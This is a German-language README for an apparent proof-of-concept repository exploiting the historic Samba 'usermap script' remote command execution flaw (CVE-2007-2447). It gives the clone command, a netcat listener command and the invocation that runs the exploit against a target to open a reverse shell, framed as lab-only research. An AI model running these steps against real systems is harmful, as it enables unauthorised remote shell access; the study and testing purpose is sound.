
PoC: Samba „usermap script“ Remote-Befehlsausführung (historische CVE). Dieses Repository enthält ein kleines Proof-of-Concept-Skript zu Forschungs- und Bildungszwecken. Das Hauptskript ist usermap_script_Command_Execution.py.
Referenzartikel: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Klonen Sie das Repository und führen Sie das Skript in einer kontrollierten Laborumgebung aus. Der PoC verwendet optional eine Reverse Shell zurück zu LHOST:LPORT — starten Sie Ihren Listener, bevor Sie das Skript ausführen, und stellen Sie sicher, dass die Abhängigkeiten installiert sind (siehe Installation).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Parameter
RHOST — Ziel-IP oder HostnameRPORT — Ziel-TCP-Port (normalerweise 139)LHOST — Listener-IP für eine Reverse-VerbindungLPORT — Listener-PortEmpfohlen: Erstellen Sie eine isolierte virtuelle Python-Umgebung und installieren Sie die Abhängigkeiten aus requirements.txt, bevor Sie das Skript ausführen.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Dieser Code wird ausschließlich für legitime Sicherheitsforschung, Bildung und defensive Tests bereitgestellt. Führen Sie dieses Skript nicht gegen ein System aus, das Ihnen nicht gehört oder für das Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben. Missbrauch kann rechtliche Konsequenzen haben; der Repository-Inhaber ist nicht für Missbrauch verantwortlich.
Bevorzugen Sie bei der Analyse potenziell gefährlichen Codes stets statische Code-Reviews und kontrollierte Labortests (VM-Snapshots, isolierte Netzwerke und Paketaufzeichnungen).
Wenn Sie einen nicht ausführbaren, kommentierten Walkthrough oder eine requirements.txt wünschen, eröffnen Sie ein Issue oder fordern Sie es hier an.